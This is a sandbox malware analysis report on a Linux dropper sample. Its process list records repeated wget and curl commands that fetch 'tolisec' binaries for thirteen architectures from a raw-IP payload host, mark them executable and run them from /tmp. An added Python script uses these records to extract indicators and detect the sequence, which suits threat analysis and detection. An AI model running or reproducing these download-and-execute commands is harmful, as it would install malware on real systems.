Malware Analysis Report

2024-10-10 10:54

Sample ID 240613-ftvm8aygjj
Target a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118
SHA256 cd9209c1c0987d201ed59bbc196a73b8f7ba47ae235dc8d7c9dde3d5b67400b9
Tags
score
7/10

Table of Contents

Analysis Overview
MITRE ATT&CK
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
7/10

SHA256

cd9209c1c0987d201ed59bbc196a73b8f7ba47ae235dc8d7c9dde3d5b67400b9

Threat Level: Shows suspicious behavior

The file a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 was classified as showing suspicious behavior (score 7/10). Only one of the four behavioral runs (behavioral1, ubuntu1804-amd64) produced process telemetry; the signatures below come from that run.

Malicious Activity Summary


Executes dropped EXE

Writes file to tmp directory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-13 05:10

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-13 05:10

Reported

2024-06-13 05:10

Platform

debian9-mipsbe-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-13 05:10

Reported

2024-06-13 05:10

Platform

debian9-mipsel-20240226-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 05:10

Reported

2024-06-13 05:12

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

50s

Max time network

130s

Command Line

[/tmp/a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lol /tmp/lol N/A
(13 identical entries, one per execution of /tmp/lol listed under Processes)

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lol /tmp/a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 N/A

Processes

/tmp/a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118

[/tmp/a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.x86]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.x86]

/bin/cat

[cat tolisec.x86]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-Clfupx]

/tmp/lol

[./lol ssh.x86]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.mips]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.mips]

/bin/cat

[cat tolisec.mips]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-Clfupx]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.mpsl]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.mpsl]

/bin/cat

[cat tolisec.mpsl]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.arm]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.arm]

/bin/cat

[cat tolisec.arm]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.arm5]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.arm5]

/bin/cat

[cat tolisec.arm5]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.arm6]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.arm6]

/bin/cat

[cat tolisec.arm6]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.arm7]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.arm7]

/bin/cat

[cat tolisec.arm7]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.ppc]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.ppc]

/bin/cat

[cat tolisec.ppc]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.m68k]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.m68k]

/bin/cat

[cat tolisec.m68k]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.spc]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.spc]

/bin/cat

[cat tolisec.spc]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.i686]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.i686]

/bin/cat

[cat tolisec.i686]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.sh4]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.sh4]

/bin/cat

[cat tolisec.sh4]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.arc]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.arc]

/bin/cat

[cat tolisec.arc]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

Network

Country Destination Domain Proto Connections
US 172.245.205.137:80 N/A tcp 26
N/A 224.0.0.251:5353 N/A udp 1
US 151.101.193.91:443 N/A tcp 1
GB 89.187.167.3:443 N/A tcp 1
GB 185.125.188.61:443 N/A tcp 1
GB 185.125.188.62:443 N/A tcp 1

The 26 port-80 connections to 172.245.205.137 are the wget and curl fetches listed under Processes (two per architecture, thirteen architectures). The Domain column is empty because the dropper addresses the host by raw IP, so there is no DNS lookup to pivot on. 224.0.0.251:5353 is the mDNS multicast address. The four port-443 destinations are not tied to any process in this report; compare them against a clean run of the same ubuntu1804 platform before treating them as indicators of this sample.
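Reading the behavioral1 Processes and Network sections together, as an added worked example that is not part of the sandbox report or of the sample: the process list repeats the same five steps for thirteen architecture suffixes (wget URL, curl -O URL, cat tolisec.ARCH, chmod +x on everything in /tmp, ./lol ssh). That is consistent with a multi-architecture dropper loop of the form cat tolisec.ARCH > lol; chmod +x *; ./lol ssh, where the redirect is inferred from the "Writes file to tmp directory" signature on /tmp/lol rather than shown by the sandbox, and the long chmod argument lists are the shell's glob expansion of /tmp. The script below replays those records as constructed input, extracts the IOCs, flags the fetch, chmod +x, execute-from-/tmp sequence by its order rather than by the presence of common binaries, and labels each Network row by whether a process record explains it. The record layouts, function names, abridged chmod arguments and the six-event window are this example's own assumptions.

```python
"""Added example (not from the sandbox report or the sample): IOC extraction,
sequence detection and network/process correlation over constructed records
that mirror the behavioral1 Processes and Network sections.

Record layouts, function names and the 6-event window are this example's
own assumptions, not a sandbox API.
"""
import ipaddress
import re
from collections import Counter
from urllib.parse import urlparse

SAMPLE = "a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118"
PAYLOAD_BASE = "http://172.245.205.137/urlhausesexy/tolisec."
ARCH_SUFFIXES = ["x86", "mips", "mpsl", "arm", "arm5", "arm6", "arm7",
                 "ppc", "m68k", "spc", "i686", "sh4", "arc"]
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")
RAW_IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def build_process_records():
    """Constructed (image path, command line) pairs replaying the report's
    per-architecture loop. The chmod argument list is abridged; in the
    report it is the glob-expanded contents of /tmp."""
    recs = [(f"/tmp/{SAMPLE}", f"/tmp/{SAMPLE}")]
    for arch in ARCH_SUFFIXES:
        url = PAYLOAD_BASE + arch
        recs += [
            ("/usr/bin/wget", f"wget {url}"),
            ("/usr/bin/curl", f"curl -O {url}"),
            ("/bin/cat", f"cat tolisec.{arch}"),
            ("/bin/chmod", f"chmod +x {SAMPLE} lol snap-private-tmp"),
            ("/tmp/lol", "./lol ssh"),
        ]
    return recs


def build_connections():
    """Constructed (country, destination, proto) rows mirroring the
    behavioral1 Network table: 26 fetches plus five other destinations."""
    return ([("US", "172.245.205.137:80", "tcp")] * 26
            + [("N/A", "224.0.0.251:5353", "udp"),
               ("US", "151.101.193.91:443", "tcp"),
               ("GB", "89.187.167.3:443", "tcp"),
               ("GB", "185.125.188.61:443", "tcp"),
               ("GB", "185.125.188.62:443", "tcp")])


def extract_iocs(records):
    """Unique URLs, per-host fetch counts, and images executed from a
    world-writable directory."""
    urls, hosts, tmp_images = set(), Counter(), set()
    for image, cmdline in records:
        for url in URL_RE.findall(cmdline):
            urls.add(url)
            hosts[urlparse(url).hostname] += 1
        if image.startswith(WORLD_WRITABLE):
            tmp_images.add(image)
    return {"urls": sorted(urls), "hosts": dict(hosts),
            "tmp_images": sorted(tmp_images)}


def flag_fetch_chmod_exec(records, window=6):
    """Flag each execution from a world-writable directory that was preceded,
    within `window` records, by a fetch from a raw-IP URL and a chmod +x.
    The signal is the ordered sequence; wget, curl and chmod on their own
    are normal on any Linux host."""
    hits = []
    for i, (image, cmdline) in enumerate(records):
        if not image.startswith(WORLD_WRITABLE):
            continue
        prior = records[max(0, i - window):i]
        fetched = [u for _, c in prior for u in URL_RE.findall(c)
                   if RAW_IPV4_RE.fullmatch(urlparse(u).hostname or "")]
        chmod_x = any(c.split()[:2] == ["chmod", "+x"] for _, c in prior)
        if fetched and chmod_x:
            hits.append({"image": image, "exec": cmdline, "fetched": fetched[-1]})
    return hits


def classify_connections(connections, iocs):
    """Group the network table by destination and label each one:
    'payload-host' when a process record fetched from it, 'multicast' for
    link-local noise such as mDNS, otherwise 'uncorrelated', meaning compare
    against a clean run of the platform before calling it an IOC."""
    counts = Counter(dest for _, dest, _ in connections)
    result = {}
    for dest, n in counts.items():
        host, _, port = dest.rpartition(":")
        if host in iocs["hosts"]:
            label = "payload-host"
        elif ipaddress.ip_address(host).is_multicast:
            label = "multicast"
        else:
            label = "uncorrelated"
        result[dest] = {"count": n, "port": int(port), "label": label}
    return result


if __name__ == "__main__":
    recs = build_process_records()
    iocs = extract_iocs(recs)
    print("unique payload URLs:", len(iocs["urls"]))
    for h in flag_fetch_chmod_exec(recs):
        print("fetch -> chmod +x -> exec:", h["fetched"], "->", h["exec"])
    for dest, info in sorted(classify_connections(build_connections(), iocs).items()):
        print(f"{dest:>22}  x{info['count']:<3} {info['label']}")
```

The sequence rule fires thirteen times on this input, once per architecture, and never on the initial launch of the sample itself because nothing was fetched before it. The same rule applied to real execve telemetry (auditd, eBPF, EDR process trees) would need the parent-child relationship instead of a fixed window, but the ordering idea is the same: fetch from a raw IP, mark executable, execute from a world-writable path.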

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 05:10

Reported

2024-06-13 05:12

Platform

debian9-armhf-20240611-en

Max time network

27s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto Connections
US 172.245.205.137:80 N/A tcp 26

The same 26 fetches from the payload host as in behavioral1, with no process telemetry recorded for this armhf run (Processes is N/A above). The count matches two downloads per architecture for the thirteen architectures, so the download loop evidently ran even though the sandbox captured no processes.

Files

N/A